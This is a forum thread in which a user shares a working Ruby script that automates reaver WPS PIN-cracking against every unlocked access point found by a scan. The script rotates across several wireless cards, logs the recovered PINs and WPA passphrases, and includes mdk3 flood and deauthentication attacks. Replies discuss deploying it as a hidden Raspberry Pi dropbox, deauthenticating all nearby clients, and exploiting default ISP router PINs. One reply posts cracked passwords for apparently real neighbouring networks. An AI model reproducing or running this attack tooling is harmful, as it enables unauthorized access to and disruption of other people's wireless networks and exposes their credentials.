
(how to) reaver dropbox... raspberry pi...


i8igmac

So, I have decided to share one of my projects. I figure I won't get much attention with this script, which is why I'm sharing...

I made a video I hope is quick, to the point and informative... please share your comments... if anyone is interested I may add some more functions to this script, like capturing handshakes for cracking later...

All you need is a Linux machine, a wireless adapter (the more the better)... Ruby and the Ruby requirement open3...

updated code...

require 'open3'
#on reboot stuff.

device=""
channel=""
ap_mac=""
essid=""
@device_list=["wlan1"]
@check=[]
#sleep 30 #sleep if you plan to start this script from startup.rc... give drives a chance to load
#`ifconfig wlan0 down`
#`iwconfig wlan0 mode monitor`
#`ifconfig wlan0 up`
`ifconfig wlan1 down`
`iwconfig wlan1 mode monitor`
`ifconfig wlan1 up`
#will not launch until the while true loop at the bottom
#reaver attack and log
def reaver(device, channel, ap_mac)
    Thread.start{
        #`ifconfig #{device} down`
        #`iwconfig #{device} mode monitor`
        #`ifconfig #{device} up`
        #puts "Random mac..."
        Open3.popen3("iwconfig #{device} channel #{channel}")
        puts "change #{channel}"
        Open3.popen3("ifconfig #{device} down")
        puts "down"
        #Open3.popen3("macchanger #{device} -r")
        puts "changemac"
        Open3.popen3("ifconfig #{device} up")
        puts "up"
        puts "reaver -i #{device} -vv -b #{ap_mac} -c #{channel}"
        Open3.popen3("reaver -i #{device} -vv -K 1 -b #{ap_mac} -c #{channel}"){|i,o,t,p|
            i.puts("y")  #tell reaver Yes to continue where the attack left off
            loop do
                #wait up to 15 seconds for a new line; the select must come BEFORE gets,
                #otherwise gets blocks forever on a frozen reaver and the timeout never fires
                if IO.select([o],nil,nil,15).nil?
                    puts "#{device} #{ap_mac}:                       TIMEOUT"
                    break
                end
                line=o.gets
                break if line.nil?   #reaver exited on its own
                puts "#{device} #{ap_mac}: #{line}"
                log_all=File.open("log_all_#{ap_mac}",'a')
                log_all.puts("#{device} #{ap_mac}: #{line}")
                log_all.close

                #100.00% complete
                #Pin cracked in
                #WPS PIN: '12345678'
                #WPA PSK: 'asshole'
                #AP SSID: 'noob'
                # Log success to another file
                if line.include?("100.00%") || line.include?("Pin cracked") || line.include?("WPS PIN:") || line.include?("WPA PSK:") || line.include?("AP SSID:")
                    success=File.open("success_#{ap_mac}",'a')
                    success.puts("#{device} #{ap_mac}: #{line}")
                    success.close
                end

                if line.include?("WARNING: Failed to associate") || line.include?("WARNING: 25 successive start failures") || line.include?("Detected AP rate limiting") || line.include?("WARNING: 10 failed connections in a row")
                    puts "#{device} #{ap_mac}:                       killing thread"
                    break
                end
            end
            #however the loop ended: kill reaver if it is still running, then
            #remove the card from the list so it can be used in a new process
            begin
                Process.kill("KILL",p.pid)
            rescue Errno::ESRCH
                #already exited, nothing to kill
            end
            @check.delete(device)
        }
    } #thread.start
end

#extra dos attacks; this function is not called from the main loop at the bottom
def mdk3(device, channel, ap_mac, essid)
    Open3.popen3("iwconfig #{device} channel #{channel}")
    Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } }
    Thread.start{Open3.popen3("mdk3 #{device} a -i #{ap_mac} -m -s 1024"){|i,o,t| while line=o.gets; puts line; end } }
    Thread.start{Open3.popen3("mdk3 #{device} m -t #{ap_mac} -j -w 1 -n 1024 -s 1024"){|i,o,t| while line=o.gets; puts line; end } }
    Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } }
    Thread.start{Open3.popen3("mdk3 #{device} w -e #{essid} -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } }
end
#scratch notes from a scan (bssid, channel, essid):
#44:94:FC:3B:E9:16       7      ANDY DALTON SOUR HOUR
#28:C6:8E:A3:10:7A      11      NETGEAR01

#the main reason for this script
# if you let reaver run for too long, it may hang without any data output (frozen state)... so killall and restart
#just added a few extra dos attacks

#reaver -i #{device} -vv --dh-small -b 20:76:00:1C:D9:C8 -c 6
#reaver -i wlan2 -vv --dh-small -b 4C:60:DE:31:C3:79 -c 8

def gather()
    scan_complete=false
    while scan_complete==false
        @device_list.each{|wlan|
            if not @check.include?(wlan)
                puts "#{wlan} scanning with wash"
                buff=""
                #let wash scan for 25 seconds, then kill it and keep what it printed
                Open3.popen3("wash -i #{wlan} -C"){|i,o,t,p|
                    Thread.start{sleep 25; Process.kill("KILL",p.pid)}
                    while line=o.gets; buff<<line; end
                }
                @list=[]
                #keep only rows whose WPS is not locked ("No"), stored as "channel bssid"
                buff.encode!('UTF-8', 'binary', invalid: :replace, undef: :replace, replace: '').each_line{|x| if x.include?("No"); @list<<"#{x.split[1]} #{x.split[0]}"; end; }
                puts @list
                scan_complete=true
                break
            else
                puts "waiting for device to free up... redo"
                sleep 3
                next
            end
        }
    end
end





try_again=false
while true
    gather()
    @list.each{|stack|
        #puts "trying #{stack}"
        sleep 1
        @device_list.each{|wlan|
            if not @check.include?(wlan)
                puts @check
                @check<<wlan
                #reaver("wlan2",       "6",                 "20:76:00:1C:D9:C8")
                reaver("#{wlan.chomp}","#{stack.split[0]}", "#{stack.split[1]}")
                try_again=false
                break
            else
                try_again=true
            end
        }

        #every card is busy: wait and try this access point again
        if try_again==true
            redo
        end
    }
end

Edited by i8igmac

  • 7 months later...

I decided to open this script last night and launch this attack. (In a controlled test environment of course)

In about 4 hours I have cracked 4 wireless access points... it really is a success! The way this algorithm controls reaver and can micro-manage multiple Alfa cards to quickly alternate through a list of access points... set it and forget it... you only need Kali and a WiFi card, the more the better!

I really need to work on my presentation...

EDIT: check the new script above and video


Hey, that's pretty neat right there. I'm gonna check this out in a bit.

Like I said in your video comments, you should try updating your script to work with the pixie dust attack.

Edited by ZaraByte

I'll look into this pixie dust attack. I may put this on a GitHub... I'll clean it up and correct the output... it currently works well when I place this script in my /etc/rc.local... it just needs to wait for the drivers to load before the script starts... simply sleep for 30 seconds...

I'd like to know how you install open3. I've never messed with Ruby before, so this is new to me. I was planning to order one of these http://amzn.com/B0088PPFP4 and turn it into a drop box since it has a built-in battery.

I updated the script above. I didn't change much; you will notice on the reaver command -K 1

It seems that reaver is attacking the chip driver, K 1,2,3... I would think reaver is capable of detecting the wireless chip and performing this attack without even declaring -K

I can't remember how I installed open3. I believe installing Metasploit may include open3

gem install open3

apt-cache search open3

there is a github I believe...

You can require '/home/some/git/clone/location/open3.rb'

This device you posted looks interesting... I'm interested in a device advertised on the Kali home page, 'trim slice', runs on 12v.

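Two things worth pinning down from this reply and from the script in the first post: open3 is part of Ruby's standard library, so require 'open3' works on any stock Ruby with nothing to gem or apt install, and a reader that wants to notice a frozen child has to call IO.select before gets, because gets alone blocks until the child prints something. The example below is added by the editor and is not code from the thread; it supervises a constructed, harmless child (sh with echo and sleep) rather than any tool the thread discusses, and the helper name supervise and its return shape are this example's own.

```ruby
require 'open3'   # part of Ruby's standard library: nothing to gem/apt install

# Stream a child's stdout line by line; if it prints nothing for idle_timeout
# seconds, treat it as hung, SIGKILL it and stop. The helper name and the
# return shape are this example's own choices, not the thread's script.
# Returns {lines:, status: :exited | :timeout, exitstatus: Integer | nil}.
def supervise(*cmd, idle_timeout: 15)
  lines = []
  status = :timeout
  exitstatus = nil
  Open3.popen3(*cmd) do |stdin, stdout, _stderr, wait_thr|
    stdin.close                        # the child gets no input here
    loop do
      # select BEFORE gets: gets on a silent pipe blocks with no way to time out
      ready = IO.select([stdout], nil, nil, idle_timeout)
      break if ready.nil?              # silence for idle_timeout seconds: hung
      line = stdout.gets
      if line.nil?                     # EOF: the child finished on its own
        status = :exited
        break
      end
      lines << line.chomp
    end
    if status == :timeout
      begin
        Process.kill("KILL", wait_thr.pid)
      rescue Errno::ESRCH
        # exited between select and kill; nothing left to signal
      end
    end
    exitstatus = wait_thr.value.exitstatus  # nil when the child was killed
  end
  { lines: lines, status: status, exitstatus: exitstatus }
end

if $PROGRAM_NAME == __FILE__
  # constructed stand-in for a child that talks, then freezes
  p supervise("sh", "-c", "echo one; echo two; exec sleep 30", idle_timeout: 1)
  # constructed stand-in for a child that finishes normally
  p supervise("sh", "-c", "echo done; exit 3", idle_timeout: 2)
end
```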

This is a pretty sweet script. I've thought about doing something like this but I really didn't know how to go about it.

This is right there with wifite for easy mode.

It would be cool if there was a script for automatically detecting associated wireless clients and deauthenticating them for handshakes. Then a guy could go full beast mode and just destroy the wifis. I'm not sure how to get outputs from programs like reaver and use them as variables. Anybody want to talk about this?

Actually you could just put something like this into the script where the reaver WPS attack fails.

Open3.popen3("wifite -b #{ap_mac}")

This just looks right but I don't know ruby.

Edited by vailixi
I have done this before, using 2 cards: set one card to log the handshakes, and another card to deauth all clients... I spent some time scripting all this kung fu and it was a part of my script, but it turns out I found a simpler way...

airodump-ng wlan0

mdk3 wlan1 d (deauthenticate all clients from all access points)


I don't remember exactly. It looks like it cycles through all clients... I tested it for about a minute...

I should start a little tutorial on Ruby automated WiFi attacks... starting with a custom deauth attack using airbase...

Thread.start{Open3.popen3("airodump-ng -w log -d wlan1")}

This will start logging in plain text a csv file which holds all the clients associated with an access point. All the information you need is easily accessible in Ruby... you just need to organize everything and launch an attack of your choice...


if you install open3 successfully, post your install method... I never had any problems but can't remember my install method

Sure, I'll try to set it up today or tomorrow.

I didn't code in Ruby before but it seems like I need to add wlan2 here?

@device_list=["wlan1"]

Not sure what syntax Ruby uses to use multiple parameters?

From the code it seems like each WiFi card tries to crack its own access point?

In the video I don't see the script running the mdk3 attack on an access point, but I see a function for the attack in the script?

Thanks for the help, I just want to figure out how it actually works :)

Edited by IvanDoe

Ok so I tried the script via VMware. I do have a Raspberry around but figured I'd try it in a VM first.

I used Kali 2, didn't have to install open3, it worked out of the box, I just had to change the interface name in the script, wlan1/wlan2.

Stopped it after a few minutes but it seems to work cool. I'll set up Kali on the Raspberry and try it out as a dropbox somewhere :)

Anyway, as I posted yesterday, the Alfa AWUS036NEH seems to have driver issues or something else with Kali 2.0 (monitor mode won't show any access points), so I used the older AWUS036H with this script.

Glad to see it worked for you... I figured it would work out of the box on a Kali machine...

Update on my findings using one wireless card to attack multiple access points in a multi-threaded or multi-processed fashion... I did successfully crack a new device with this configuration...

@device_list=["mon0","mon1","mon2", "wlan1"]

I ran airmon-ng start wlan1 several times on a single wireless card to create multiple tap devices... then launched the script... this script is designed to micro-manage multiple interfaces... I would like to see if anyone objects to this kind of setup... I have done this before in the past with other kinds of attacks...

Take a look at this scan of airodump...

airodump-ng wlan1 --essid-regex=my
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 z0:4A:03:C3:D6:B5  -55       17        0    0  11  54 . WPA2 CCMP   PSK  myqwest6671
 z8:39:44:5B:48:AC  -56       20        0    0   6  54e  WPA2 CCMP   PSK  myqwest6322
 z0:26:88:E2:CF:28  -60        6        1    0  11  54e  WPA2 CCMP   PSK  myqwest3957
 z0:24:7B:6F:A5:D4  -66        6        1    0  11  54   WPA2 CCMP   PSK  myqwest6947

airodump-ng wlan1 --essid-regex=HOME
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 z4:04:15:0F:42:14  -48       11        0    0  11  54e  WPA2 CCMP   PSK  HOME-7EC8_EXT
 zC:35:40:75:38:99  -53       10        0    0   1  54e  WPA2 CCMP   PSK  HOME-3899
 z8:7B:8C:26:EE:F5  -54        3        2    0   1  54e  WPA2 CCMP   PSK  HOME-051F_RE
 z8:F7:C7:66:19:8F  -56       11        0    0  11  54e  WPA2 CCMP   PSK  HOME-198F
 z0:71:C2:EF:7E:D0  -56       10        0    0  11  54e. WPA2 CCMP   PSK  HOME-06B1-2.4
 z4:AB:F0:11:D0:90  -62        4        0    0   6  54e  WPA2 CCMP   PSK  HOME-D092
 z4:BE:F7:E8:BA:48  -63        4        0    0   6  54e. WPA2 CCMP   PSK  HOME-5AF7-2.4
 z0:1D:D4:8C:19:00  -63        5        0    0   6  54e  WPA2 CCMP   PSK  HOME-1902
 z4:85:2A:97:9D:D8  -67        2        0    0   6  54e. WPA2 CCMP   PSK  HOME-7804-2.4

Why would you think these routers share the same name? Perhaps these are identical devices, identical firmware or hardware issued by identical Internet service providers...

Look at these cracked pins... I'll bet you money I can guess the default pin for all the routers above!

wlan1 z0:26:88:E2:CF:28: [+] WPS PIN: '12345670'
wlan1 z0:26:88:E2:CF:28: [+] WPA PSK: 'pupy20103251'
wlan1 z0:26:88:E2:CF:28: [+] AP SSID: 'myqwest3957'

wlan1 z0:71:C2:EF:7E:D0: [+] WPS PIN: '12345670'
wlan1 z0:71:C2:EF:7E:D0: [+] WPA PSK: '9H3TDTH9HVCPDT7Y'
wlan1 z0:71:C2:EF:7E:D0: [+] AP SSID: 'HOME-06B1-2.4'

mon1 z0:76:00:1C:D9:C8: [+] WPS PIN: '12345670'
mon1 z0:76:00:1C:D9:C8: [+] WPA PSK: 'i6bz7dd8s7haxt'
mon1 z0:76:00:1C:D9:C8: [+] AP SSID: 'myqwest4681'

wlan1 z8:39:44:5B:48:AC: [+] WPS PIN: '12345670'
wlan1 z8:39:44:5B:48:AC: [+] WPA PSK: '003368f2006dd11b8b052f0995'
wlan1 z8:39:44:5B:48:AC: [+] AP SSID: 'myqwest6322'

wlan2 z4:E0:C5:03:D9:23: [+] WPS PIN: '00000000'
wlan2 z4:E0:C5:03:D9:23: [+] WPA PSK: 'akDztnO2giB53LYSUr5JHUSQ4xJD78'
wlan2 z4:E0:C5:03:D9:23: [+] AP SSID: 'SEC_LinkShare_f50c6f'
So, try to imagine why reaver has failed to crack all these default pins...

SIGNAL STRENGTH!!!

The success packet holding all the gold just never made it to your machine and reaver reported a failed attack after long hours of work...

To build a successful attack, all I need is a list of default pins and a directional antenna... Bob's your uncle... PeWnND lol

Edited by i8igmac

Can I ask how many wireless cards you're using? I'd like to do a video on this and credit you in the video. Also, which version of Kali Linux are you using for your Pi, is it 2.0 or the older version of Kali Linux ARM?


Currently, my Raspberry Pi in my attack space is running Kali 1

updated reaver that includes pixiedust

Aircrack-ng 1.2 rc1 (I don't think it will matter)

How many cards do you have? In my previous post I was successful with only using one card and creating multiple tap interfaces

mon0 mon1 mon2 mon3

There is a bit of an adjustment I need to make to get better performance with this method...

You're better off running the script like below...

@device_list=[ARGV[0]]

Change this line at the top of the script... open several terminals, and run like this... of course stop network managers and such...

ruby script.rb wlan0

ruby script.rb wlan1

ruby script.rb wlan2

ruby script.rb wlan4

ruby script.rb wlan5

There is so much to explain and I will fail to get the information out properly ,-)

Different devices show different scan results, so the same goes for devices using different antennas...

I hope to get more time to modify things and help you create a better video!

I feel like a nerd talking to his laptop


Not too familiar with Ruby (something new to delve into), but would it be possible to add/modify the script to send an email on success to something like Gmail which, alongside a cell phone alert, lets you know it's done?

Like in Python

def send_email(user, pwd, recipient, subject, body):
    import smtplib

    gmail_user = user
    gmail_pwd = pwd
    FROM = user
    TO = recipient if type(recipient) is list else [recipient]
    SUBJECT = subject
    TEXT = body

    # Prepare actual message. The original read "\From:", and since "\F" is not
    # an escape sequence the header would have started with a literal backslash.
    message = "From: %s\nTo: %s\nSubject: %s\n\n%s\n" % (FROM, ", ".join(TO), SUBJECT, TEXT)
    try:
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.ehlo()
        server.starttls()
        server.login(gmail_user, gmail_pwd)
        server.sendmail(FROM, TO, message)
        server.quit()
        print('successfully sent the mail')
    except smtplib.SMTPException as e:   # catch SMTP failures only, not every error
        print("failed to send mail: %s" % e)

http://stackoverflow.com/questions/10147455/trying-to-send-email-gmail-as-mail-provider-using-python

Working on something similar in python to automate attacks for Kali, and ideally suited for nethunter and potentially a bluetooth paired android smartwatch as well.

Edited by deadlyhabit

I'm getting errors after pasting it in vi and trying to run this on net hunter.

root@kali:~# ./autopwn.rb
./autopwn.rb: line 1: require: command not found
./autopwn.rb: line 8: @device_list=[wlan1]: command not found
./autopwn.rb: line 9: @check=[]: command not found
./autopwn.rb: line 19: syntax error near unexpected token `('
./autopwn.rb: line 19: `def reaver(device, channel, ap_mac)'

Would be nice if someone could make this into a bash script; it'd be more compatible.

Nethunter is Kali?

root@kali:~# ruby autopwn.rb

@datahead I don't know much about reaver's pixiedust function. My understanding is k1 k2 k3 will target a specific chip driver?

Edited by i8igmac
Working now! I was trying to run it as a bash script; running it with ruby first works just fine, no issues! The script works really nice, but this script would be epic if someone converted it to a Bash script because then it might work on devices like the Pineapple.


I'm sure it can be done; I never bothered with bash... I chose Ruby because the Metasploit developers chose Ruby...

And I facking luv it!

It'd be cool to see it as a bash script. I'm not sure if you can install Ruby on OpenWRT or not, but I'd love to put this script on a TP-LINK MR3040; that'd be so awesome to use, but the only issue is the wireless card. Sadly I found out the TP-LINK MR3040 needs a USB drive to hold files because I don't think it has enough internal memory to hold a lot of stuff.

This Ruby works fine on the Nexus 7 2013 WiFi tablet with Nethunter 2.0 installed; you just need to follow deadlyhabit's guide on getting monitor mode to work.

Edited by ZaraByte

A quick search and I found Ruby install guides for OpenWRT.

I believe, in Kali, OpenWRT has too many limitations... I plan on buying a new device to replace the Pi... the amount of cords connected to my Pi resembles a hot mess...

If I can eliminate the powered USB hub, maybe I can with a 12v orange slice?

Mobile is key
